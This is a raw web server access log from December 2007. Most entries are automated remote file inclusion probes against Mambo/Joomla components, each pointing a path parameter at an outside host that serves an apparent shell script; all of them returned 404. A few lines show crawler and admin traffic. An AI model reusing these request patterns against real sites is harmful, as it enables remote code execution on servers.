200.76.166.4 - - [27/Dec/2007:12:04:32 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.76.166.4 - - [27/Dec/2007:12:04:53 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.0.73.2 - - [27/Dec/2007:12:04:57 -0800] "GET /logs/access_071222.log//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [27/Dec/2007:12:04:57 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.35.179 - - [27/Dec/2007:12:05:49 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
203.237.123.135 - - [27/Dec/2007:12:05:54 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.217.229.90 - - [27/Dec/2007:12:07:17 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:07:44 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:07:44 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:07:45 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:07:45 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:07:45 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:07:45 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.229.90 - - [27/Dec/2007:12:07:51 -0800] "GET /logs/access_071222.log//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.234.55.146 - - [27/Dec/2007:12:07:51 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.229.90 - - [27/Dec/2007:12:07:52 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.234.55.146 - - [27/Dec/2007:12:07:52 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.234.55.146 - - [27/Dec/2007:12:07:52 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.229.90 - - [27/Dec/2007:12:07:52 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
125.245.27.77 - - [27/Dec/2007:12:08:12 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.112.28 - - [27/Dec/2007:12:08:34 -0800] "GET /logs/access_071222.log//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.112.28 - - [27/Dec/2007:12:08:34 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.112.28 - - [27/Dec/2007:12:08:34 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.80.210.14 - - [27/Dec/2007:12:08:59 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:09:09 -0800] "GET /logs/access_071110.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.234.55.146 - - [27/Dec/2007:12:09:51 -0800] "GET /logs/access_071110.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:09:53 -0800] "GET /logs/access_071110.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.80.210.14 - - [27/Dec/2007:12:09:54 -0800] "GET /logs/access_071222.log//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.80.210.14 - - [27/Dec/2007:12:09:55 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.80.210.14 - - [27/Dec/2007:12:09:55 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.94.24.226 - - [27/Dec/2007:12:10:05 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ferien-im-suedharz.de/f/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [27/Dec/2007:12:10:29 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.universidadcorporativa.com/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [27/Dec/2007:12:10:29 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.universidadcorporativa.com/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [27/Dec/2007:12:10:29 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.universidadcorporativa.com/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.116.91.77 - - [27/Dec/2007:12:10:29 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ferien-im-suedharz.de/f/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.116.91.77 - - [27/Dec/2007:12:10:30 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ferien-im-suedharz.de/f/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.224 - - [27/Dec/2007:12:11:00 -0800] "GET /logs/access_071209.log HTTP/1.0" 200 44097 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.255.3.70 - - [27/Dec/2007:12:11:32 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://sagasufx.com/stats.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
89.255.3.70 - - [27/Dec/2007:12:11:33 -0800] "GET //skin/zero_vote/error.php?dir=http://sagasufx.com/stats.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
69.94.24.226 - - [27/Dec/2007:12:11:48 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ferien-im-suedharz.de/f/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.237.123.135 - - [27/Dec/2007:12:12:00 -0800] "GET /logs/access_071222.log//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.237.123.135 - - [27/Dec/2007:12:12:00 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.237.123.135 - - [27/Dec/2007:12:12:01 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.245.27.77 - - [27/Dec/2007:12:12:20 -0800] "GET /logs/access_071222.log//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.245.27.77 - - [27/Dec/2007:12:12:20 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.245.27.77 - - [27/Dec/2007:12:12:25 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.116.91.77 - - [27/Dec/2007:12:14:02 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ferien-im-suedharz.de/f/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.116.91.77 - - [27/Dec/2007:12:14:03 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ferien-im-suedharz.de/f/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.175.72 - - [27/Dec/2007:12:14:14 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:12:16:34 -0800] "GET //skin/zero_vote/error.php?dir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.123.8.38 - - [27/Dec/2007:12:17:39 -0800] "GET /logs/access_071215.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://freeadnotes.com/images/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.175.72 - - [27/Dec/2007:12:18:20 -0800] "GET /logs/access_071222.log//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.175.72 - - [27/Dec/2007:12:18:29 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.175.72 - - [27/Dec/2007:12:18:29 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.44 - - [27/Dec/2007:12:18:36 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.232.250 - warboard [27/Dec/2007:12:20:03 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=575 HTTP/1.1" 200 7615 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [27/Dec/2007:12:21:04 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=575 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=575" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [27/Dec/2007:12:21:05 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=575&just_updated=1 HTTP/1.1" 200 7657 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=575" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [27/Dec/2007:12:21:12 -0800] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=575&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [27/Dec/2007:12:21:14 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [27/Dec/2007:12:21:15 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33010 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:22:47 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:22:47 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:22:47 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:22:54 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:22:54 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:22:55 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:23:00 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:23:00 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:23:00 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:23:02 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:23:02 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:23:02 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:23:12 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:23:13 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:23:13 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:23:16 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:23:16 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:23:16 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.44 - - [27/Dec/2007:12:23:44 -0800] "GET /logs/access_071222.log//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:23:47 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:23:47 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:23:47 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.27.203.44 - - [27/Dec/2007:12:23:53 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.44 - - [27/Dec/2007:12:23:54 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:24:11 -0800] "GET /logs/access_071110.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:24:11 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:24:11 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:25:33 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:25:33 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:25:33 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:25:38 -0800] "GET /logs/access_071110.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:26:37 -0800] "GET /logs/access_071110.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:26:38 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:26:38 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:26:40 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:26:46 -0800] "GET /logs/access_071110.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.188.218.110 - - [27/Dec/2007:12:26:56 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.67.55.94 - - [27/Dec/2007:12:27:24 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.universidadcorporativa.com/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:29:26 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:12:37:19 -0800] "GET /bikes/?M=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:12:38:24 -0800] "GET /logs/access_071216.log//skin/zero_vote/error.php?dir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:12:38:24 -0800] "GET //skin/zero_vote/error.php?dir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:12:38:24 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:12:38:58 -0800] "GET /logs/access_071110.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.115.46 - - [27/Dec/2007:12:40:08 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.46 - - [27/Dec/2007:12:40:08 -0800] "GET /tmp/sess_47eb024e4e27f3b581faf3e0d3dd5074 HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:12:42:08 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.169.162.122 - - [27/Dec/2007:12:42:56 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.filmforum.pl//modules/My_eGallery/public/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
81.169.162.122 - - [27/Dec/2007:12:42:57 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.filmforum.pl//modules/My_eGallery/public/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
70.86.24.154 - - [27/Dec/2007:12:43:32 -0800] "GET /logs/access_071216.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
